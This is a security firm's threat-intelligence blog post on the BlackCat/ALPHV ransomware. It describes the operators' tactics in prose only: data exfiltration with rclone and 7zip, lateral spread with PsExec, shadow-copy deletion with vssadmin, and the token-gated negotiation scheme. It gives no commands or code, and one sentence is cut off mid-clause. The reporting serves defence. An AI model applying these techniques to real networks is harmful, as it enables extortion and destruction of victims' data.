Caleb Boma | December 10th, 2021

BlackCat Ransomware

Coded in Rust, a new ransomware operation known as either BlackCat or ALPHV, was discovered last month. Potentially, this is one of the more sophisticated variants of the year with a customizable component allowing for attacks on enterprise networks.

Rust is not usually the primary coding language utilized by threat actors but has been utilized at an increasing rate due to memory safety and performance. The ransomware named ALPHV by its developers is being promoted on Russian-speaking forums. The BlackCat name comes from the favicon on every Tor site containing victim data and was dubbed by @MalwareHunterTeam on Twitter, although, as of right now, the BlackCat. The Ransomware-as-a-Service (RaaS) operation recruits affiliates to breach and encrypt network devices, much like other RaaS operations.

The ransomware is completely command-line driven, human-operated, and highly configurable. The configurability allows it to use different encryption routines, spread through different computers, kill VMs and ESXi VMs, and automatically wipe ESXi snapshots to prevent the recovery of data. Each executable includes JSON configuration which allows for the customization of extensions, ransom notes, how the data will be encrypted, excluded folders/files, and the services and processes to be automatically terminated.

Ransomware expert Michael Gillespie claims after his investigation there are no weaknesses currently that would allow for free decryption. On Dec. 8, Gillespie tweeted (@demonslay335), “analyzed another sample of this not too long ago but couldn’t talk about it due to client confidentiality… uses AES128-CTR and RSA-2048, is secure. Filemarker 19 47 B7 4d at EOF and before the encrypted key, which is JSON with some settings. Very sophisticated ransomware.”

Ransom negotiations in recent instances have allowed for the hijacking of conversations because samples getting leaked through malware analysis allow full access. To ensure negotiations aren’t disrupted, the developers created an access token that has to be used when launching the encryptor. The token is used to generate the access key needed to enter a negotiation chat on the ransomware group’s leak site. Since the token isn’t included in the malware sample, uploading it to a malware analysis site doesn’t benefit anyone because researchers cannot use it to access a negotiation site without the ransom note from the actual attack.

Ransoms from various cases have ranged from $400K to $1M in Monero since BlackCat’s was first identified in November. If victims attempt to pay in Bitcoin rather than Monero, a 15% fee is added to the ransom.

MalwareHunterTeam expressed to BleepingComputer that the first submission for the new operation was November 21st, but SpearTip’s investigation proves that the ransomware operation has been active prior to this submission.

According to SpearTip’s analysis, coded in Rust, BlackCat uses 7zip and rclone for data exfiltration. The malware pulled down the Github STD libraries and compiled them on the endpoint which provided the framework for them to use rust commands to enumerate shares, servers, traverse the file system, and laterally propagate the ransomware payload with the trigger being an access token found in a batch file named start.bat. The self-propagation is accomplished by a built-in function to use PsExec. BlackCat also has a built-in anti-recovery method that deletes the shadow volume copy using vssadmin.exe.

Further investigation into the leak sites, ALPHV (knife favicon) and BlackCat (black cat favicon) have different sites but they seem as though they’re synonymous given the timing of their appearance and the similarities in access.

This group is evidence of the continued evolution of threat actor tactics as they were very destructive by deleting backups and logs, changing firewall and Azure credentials, and more malicious behavior. If your organization is dealing with a BlackCat ransomware attack, call SpearTip and our engineers will begin mitigating the attack immediately. A better approach would be proactively increasing the posture of your security environment or continuously monitoring for threats with our ShadowSpear Platform. Don’t hesitate to contact us with issues arising from constant threats and be vigilant with your security measures.